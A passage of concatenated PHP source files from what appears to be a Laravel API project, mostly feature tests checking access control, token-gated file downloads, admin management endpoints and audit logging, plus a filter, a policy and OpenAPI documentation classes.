"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\File;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\File;\nuse App\\Services\\FileService;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass DownloadControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_download_private(): void\n {\n $file = factory(File::class)->states('private')->create();\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function guest_can_download_public(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('public')->create();\n $file->upload('Test content');\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_OK);\n $response->assertHeader('Content-Type', File::MIME_TYPE_TXT . '; charset=UTF-8');\n $this->assertEquals('Test content', $response->getContent());\n }\n\n /** @test */\n public function end_user_cannot_download_private(): void\n {\n $file = factory(File::class)->states('private')->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function end_user_can_download_public(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('public')->create();\n $file->upload('Test content');\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_OK);\n $response->assertHeader('Content-Type', File::MIME_TYPE_TXT . '; charset=UTF-8');\n $this->assertEquals('Test content', $response->getContent());\n }\n\n /** @test */\n public function admin_can_download_public(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('public')->create();\n $file->upload('Test content');\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_OK);\n $response->assertHeader('Content-Type', File::MIME_TYPE_TXT . '; charset=UTF-8');\n $this->assertEquals('Test content', $response->getContent());\n }\n\n /** @test */\n public function admin_can_download_private_with_valid_token(): void\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('private')->create();\n $file->upload('Test content');\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = (new FileService())->request($file, $admin);\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\", ['token' => $fileToken->id]);\n\n $response->assertStatus(Response::HTTP_OK);\n $response->assertHeader('Content-Type', File::MIME_TYPE_TXT . 
'; charset=UTF-8');\n $this->assertEquals('Test content', $response->getContent());\n }\n\n /** @test */\n public function admin_cannot_download_private_with_valid_token_for_another_admin(): void\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('private')->create();\n $file->upload('Test content');\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = (new FileService())->request($file, factory(Admin::class)->create());\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\", ['token' => $fileToken->id]);\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function admin_cannot_download_private_with_expired_token(): void\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('private')->create();\n $file->upload('Test content');\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = (new FileService())->request($file, $admin);\n\n Passport::actingAs($admin->user);\n\n Date::setTestNow(\n Date::now()->addSeconds(\n (int)config('connecting_voices.file_tokens.expiry_time') + 1\n )\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\", ['token' => $fileToken->id]);\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function admin_cannot_download_private_without_token(): void\n {\n $file = factory(File::class)->states('private')->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_download(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('public')->create();\n $file->upload('Test content');\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/files/{$file->id}/download\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $file): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Downloaded file [{$file->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6136701107025146,
"alphanum_fraction": 0.6151559948921204,
"avg_line_length": 23.925926208496094,
"blob_id": "506e57f64879abf55a786d4bd22e8d826dbfc3bd",
"content_id": "96f5c7e368dd354d3bed5df26b11777df8ab866b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 673,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 27,
"path": "/app/Http/Filters/Audit/AdminIdFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\Audit;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass AdminIdFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param string $adminId\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $adminId, string $property): Builder\n {\n return $query->whereHas(\n 'user.admin',\n function (Builder $query) use ($adminId): void {\n $query->where('id', '=', $adminId);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6411378383636475,
"alphanum_fraction": 0.6433260440826416,
"avg_line_length": 17.280000686645508,
"blob_id": "1ea90b13b3dca5054b95368b0b8a926da0d6fa5f",
"content_id": "67a684e9561cc9baa409caf88e63dc0745f4df44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 457,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 25,
"path": "/app/Policies/ExportPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass ExportPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can request the export.\n *\n * @param \\App\\Models\\User $user\n * @param string $export\n * @return bool\n */\n public function request(User $user, string $export): bool\n {\n return $user->isAdmin();\n }\n}\n"
},
{
"alpha_fraction": 0.6471494436264038,
"alphanum_fraction": 0.6479198932647705,
"avg_line_length": 30.658536911010742,
"blob_id": "473d0120463c5f50a40ba392a9ad341a58f0402a",
"content_id": "3e925eec60222d6360d128225d98040794c27069",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1298,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 41,
"path": "/app/Docs/Operations/Admins/ShowAdminOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Admins;\n\nuse App\\Docs\\Schemas\\Admin\\AdminSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\AdminsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowAdminOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific admin')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(AdminsTag::create())\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, AdminSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5556875467300415,
"alphanum_fraction": 0.5559845566749573,
"avg_line_length": 38.61176300048828,
"blob_id": "bba968b1e20cbf1c775472e844a971b48dd9d37f",
"content_id": "5bcdb2c0bb13911707f290c2acbfe087040463c4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3367,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 85,
"path": "/app/Docs/Operations/Contributions/IndexContributionOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Contributions;\n\nuse App\\Docs\\Parameters\\FilterParameter;\nuse App\\Docs\\Parameters\\PageParameter;\nuse App\\Docs\\Parameters\\PerPageParameter;\nuse App\\Docs\\Parameters\\SortParameter;\nuse App\\Docs\\Schemas\\Contribution\\ContributionSchema;\nuse App\\Docs\\Schemas\\PaginationSchema;\nuse App\\Docs\\Tags\\ContributionsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass IndexContributionOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all contributions')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n <<<'EOT'\n * If accessed by the public, then only public contributions will be accessible.\n * If access by an end user, then only public contributions and all of their own \n will be accessible.\n EOT\n )\n )\n ->tags(ContributionsTag::create())\n ->noSecurity()\n ->parameters(\n PageParameter::create(),\n PerPageParameter::create(),\n FilterParameter::create(null, 'id')\n ->description('The IDs of the contributions to filter by')\n ->schema(Schema::string())\n ->style(FilterParameter::STYLE_SIMPLE),\n FilterParameter::create(null, 'end_user_id')\n ->description(\n <<<'EOT'\n The ID of an end user to filter by\n\n * Can only be used by an end user when specifying their own ID.\n * Can be used by an admin.\n EOT\n )\n ->schema(Schema::string()->format(Schema::FORMAT_UUID)),\n FilterParameter::create(null, 'tag_ids')\n ->description(\n <<<'EOT'\n A comma separated list of tag IDs to filter by\n \n * Use `untagged` to search for contributions that have no tag (ignores soft \n deleted tags).\n EOT\n )\n ->schema(Schema::string()),\n SortParameter::create(null, ['created_at'], '-created_at')\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n PaginationSchema::create(null, ContributionSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.4742636978626251,
"alphanum_fraction": 0.48958620429039,
"avg_line_length": 26.98202896118164,
"blob_id": "568a2d331a4ab9f34db97abc1a1bd2eddb23b70b",
"content_id": "8ba4d28710adbcabe5f08e5d56fee207474ddf5b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 21798,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 779,
"path": "/tests/Feature/V1/AdminControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\Notification;\nuse App\\Models\\User;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass AdminControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_cannot_index(): void\n {\n $response = $this->getJson('/v1/admins');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/admins');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/admins');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/admins');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'name',\n 'phone',\n 'email',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson('/v1/admins');\n\n $response->assertJsonFragment([\n [\n 'id' => $admin->id,\n 'name' => $admin->name,\n 'phone' => $admin->phone,\n 'email' => $admin->user->email,\n 'created_at' => $admin->user->created_at->toIso8601String(),\n 'updated_at' => $admin->user->updated_at->toIso8601String(),\n ],\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $admin1 = factory(Admin::class)->create();\n $admin2 = factory(Admin::class)->create();\n $admin3 = factory(Admin::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/admins', [\n 'filter[id]' => \"{$admin1->id},{$admin2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $admin1->id]);\n $response->assertJsonFragment(['id' => $admin2->id]);\n $response->assertJsonMissing(['id' => $admin3->id]);\n }\n\n /** @test */\n public function can_filter_by_name_for_index(): void\n {\n $admin1 = factory(Admin::class)->create([\n 'name' => 'John',\n ]);\n $admin2 = factory(Admin::class)->create([\n 'name' => 'Doe',\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'name' => 'Test',\n ])->user\n );\n\n $response = $this->getJson('/v1/admins', ['filter[name]' => 'John']);\n\n $response->assertJsonFragment(['id' => $admin1->id]);\n $response->assertJsonMissing(['id' => $admin2->id]);\n }\n\n /** @test */\n public function can_filter_by_email_for_index(): void\n {\n $admin1 = factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n $admin2 = factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ])->user\n );\n\n $response = $this->getJson('/v1/admins', ['filter[email]' => '[email 
\n\n        $response->assertJsonFragment(['id' => $admin1->id]);\n        $response->assertJsonMissing(['id' => $admin2->id]);\n    }\n\n    /** @test */\n    public function can_filter_by_phone_for_index(): void\n    {\n        $admin1 = factory(Admin::class)->create([\n            'phone' => '07000000000',\n        ]);\n        $admin2 = factory(Admin::class)->create([\n            'phone' => '07999999999',\n        ]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create([\n                'phone' => '00000000000',\n            ])->user\n        );\n\n        $response = $this->getJson('/v1/admins', ['filter[phone]' => '07000000000']);\n\n        $response->assertJsonFragment(['id' => $admin1->id]);\n        $response->assertJsonMissing(['id' => $admin2->id]);\n    }\n\n    /** @test */\n    public function can_sort_by_name_for_index(): void\n    {\n        $admin1 = factory(Admin::class)->create([\n            'name' => 'Borris',\n        ]);\n        $admin2 = factory(Admin::class)->create([\n            'name' => 'Andrew',\n        ]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create([\n                'name' => 'Carl',\n            ])->user\n        );\n\n        $response = $this->getJson('/v1/admins', ['sort' => 'name']);\n\n        $response->assertNthIdInCollection(1, $admin1->id);\n        $response->assertNthIdInCollection(0, $admin2->id);\n    }\n\n    /** @test */\n    public function can_sort_by_email_for_index(): void\n    {\n        $admin1 = factory(Admin::class)->create([\n            'user_id' => factory(User::class)->create([\n                'email' => 'borris@example.com',\n            ])->id,\n        ]);\n        $admin2 = factory(Admin::class)->create([\n            'user_id' => factory(User::class)->create([\n                'email' => 'andrew@example.com',\n            ])->id,\n        ]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create([\n                'user_id' => factory(User::class)->create([\n                    'email' => 'carl@example.com',\n                ])->id,\n            ])->user\n        );\n\n        $response = $this->getJson('/v1/admins', ['sort' => 'email']);\n\n        $response->assertNthIdInCollection(1, $admin1->id);\n        $response->assertNthIdInCollection(0, $admin2->id);\n    }\n\n    /** @test */\n    public function can_sort_by_phone_for_index(): void\n    {\n        $admin1 = factory(Admin::class)->create([\n            'phone' => '07111111111',\n        ]);\n        $admin2 = factory(Admin::class)->create([\n            'phone' => '07000000000',\n        ]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create([\n                'phone' => '07222222222',\n            ])->user\n        );\n\n        $response = $this->getJson('/v1/admins', ['sort' => 'phone']);\n\n        $response->assertNthIdInCollection(1, $admin1->id);\n        $response->assertNthIdInCollection(0, $admin2->id);\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_index(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        $user = factory(Admin::class)->create()->user;\n\n        Passport::actingAs($user);\n\n        $this->getJson('/v1/admins');\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($user): bool {\n                return $event->getUser()->is($user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_READ\n                    && $event->getDescription() === 'Viewed all admins.'\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n\n    /*\n     * Store.\n     */\n\n    /** @test */\n    public function guest_cannot_store(): void\n    {\n        $response = $this->postJson('/v1/admins');\n\n        $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n    }\n\n    /** @test */\n    public function end_user_cannot_store(): void\n    {\n        Passport::actingAs(\n            factory(EndUser::class)->create()->user\n        );\n\n        $response = $this->postJson('/v1/admins');\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function admin_can_store(): void\n    {\n        Passport::actingAs(\n
            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->postJson('/v1/admins', [\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n            'password' => 'P@55w0rD!',\n        ]);\n\n        $response->assertStatus(Response::HTTP_CREATED);\n    }\n\n    /** @test */\n    public function structure_correct_for_store(): void\n    {\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->postJson('/v1/admins', [\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n            'password' => 'P@55w0rD!',\n        ]);\n\n        $response->assertResourceDataStructure([\n            'id',\n            'name',\n            'phone',\n            'email',\n            'created_at',\n            'updated_at',\n        ]);\n    }\n\n    /** @test */\n    public function values_correct_for_store(): void\n    {\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->postJson('/v1/admins', [\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n            'password' => 'P@55w0rD!',\n        ]);\n\n        $response->assertJsonFragment([\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n        ]);\n    }\n\n    /** @test */\n    public function uk_mobile_required_for_store(): void\n    {\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->postJson('/v1/admins', [\n            'name' => 'John',\n            'phone' => '+1-541-754-3010',\n            'email' => 'john@example.com',\n            'password' => 'secret',\n        ]);\n\n        $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n        $response->assertJsonValidationErrors('phone');\n    }\n\n    /** @test */\n    public function secure_password_required_for_store(): void\n    {\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->postJson('/v1/admins', [\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n            'password' => 'secret',\n        ]);\n\n        $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n        $response->assertJsonValidationErrors('password');\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_store(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        $user = factory(Admin::class)->create()->user;\n\n        Passport::actingAs($user);\n\n        $response = $this->postJson('/v1/admins', [\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n            'password' => 'P@55w0rD!',\n        ]);\n\n        /** @var \\App\\Models\\Admin $admin */\n        $admin = Admin::findOrFail($response->getId());\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($user, $admin): bool {\n                return $event->getUser()->is($user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_CREATE\n                    && $event->getDescription() === \"Created admin [{$admin->id}].\"\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n\n    /*\n     * Show.\n     */\n\n    /** @test */\n    public function guest_cannot_show(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n    }\n\n    /** @test */\n    public function end_user_cannot_show(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        $endUser = factory(EndUser::class)->create();\n\n        Passport::actingAs($endUser->user);\n\n        $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function admin_can_show(): void\n    {\n        $admin = factory(Admin::class)->create();
\n\n        Passport::actingAs($admin->user);\n\n        $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertStatus(Response::HTTP_OK);\n    }\n\n    /** @test */\n    public function structure_correct_for_show(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs($admin->user);\n\n        $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertResourceDataStructure([\n            'id',\n            'name',\n            'phone',\n            'email',\n            'created_at',\n            'updated_at',\n        ]);\n    }\n\n    /** @test */\n    public function values_correct_for_show(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs($admin->user);\n\n        $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertJsonFragment([\n            'id' => $admin->id,\n            'name' => $admin->name,\n            'phone' => $admin->phone,\n            'email' => $admin->user->email,\n            'created_at' => $admin->user->created_at->toIso8601String(),\n            'updated_at' => $admin->user->updated_at->toIso8601String(),\n        ]);\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_show(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        /** @var \\App\\Models\\Admin $admin */\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs($admin->user);\n\n        $this->getJson(\"/v1/admins/{$admin->id}\");\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($admin): bool {\n                return $event->getUser()->is($admin->user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_READ\n                    && $event->getDescription() === \"Viewed admin [{$admin->id}].\"\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n\n    /*\n     * Update.\n     */\n\n    /** @test */\n    public function guest_cannot_update(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        $response = $this->putJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n    }\n\n    /** @test */\n    public function end_user_cannot_update(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs(\n            factory(EndUser::class)->create()->user\n        );\n\n        $response = $this->putJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function admin_can_update(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->putJson(\"/v1/admins/{$admin->id}\", [\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n            'password' => 'P@55w0rD!',\n        ]);\n\n        $response->assertStatus(Response::HTTP_OK);\n    }\n\n    /** @test */\n    public function structure_correct_for_update(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->putJson(\"/v1/admins/{$admin->id}\", [\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n            'password' => 'P@55w0rD!',\n        ]);\n\n        $response->assertResourceDataStructure([\n            'id',\n            'name',\n            'phone',\n            'email',\n            'created_at',\n            'updated_at',\n        ]);\n    }\n\n    /** @test */\n    public function values_correct_for_update(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->putJson(\"/v1/admins/{$admin->id}\", [\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n            'password' => 'P@55w0rD!',
\n        ]);\n\n        $response->assertJsonFragment([\n            'id' => $admin->id,\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n        ]);\n    }\n\n    /** @test */\n    public function only_password_can_be_provided_for_update(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->putJson(\"/v1/admins/{$admin->id}\", [\n            'password' => 'P@55w0rD!',\n        ]);\n\n        $response->assertJsonFragment([\n            'id' => $admin->id,\n            'name' => $admin->name,\n            'phone' => $admin->phone,\n            'email' => $admin->user->email,\n        ]);\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_update(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        /** @var \\App\\Models\\Admin $admin */\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs($admin->user);\n\n        $this->putJson(\"/v1/admins/{$admin->id}\", [\n            'name' => 'John',\n            'phone' => '07000000000',\n            'email' => 'john@example.com',\n            'password' => 'P@55w0rD!',\n        ]);\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($admin): bool {\n                return $event->getUser()->is($admin->user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_UPDATE\n                    && $event->getDescription() === \"Updated admin [{$admin->id}].\"\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n\n    /*\n     * Destroy.\n     */\n\n    /** @test */\n    public function guest_cannot_destroy(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        $response = $this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n    }\n\n    /** @test */\n    public function end_user_cannot_destroy(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs(\n            factory(EndUser::class)->create()->user\n        );\n\n        $response = $this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function admin_can_destroy(): void\n    {\n        $admin = factory(Admin::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n        $response->assertStatus(Response::HTTP_OK);\n    }\n\n    /** @test */\n    public function database_records_and_relationships_deleted_for_destroy(): void\n    {\n        $admin = factory(Admin::class)->create();\n        $audit = 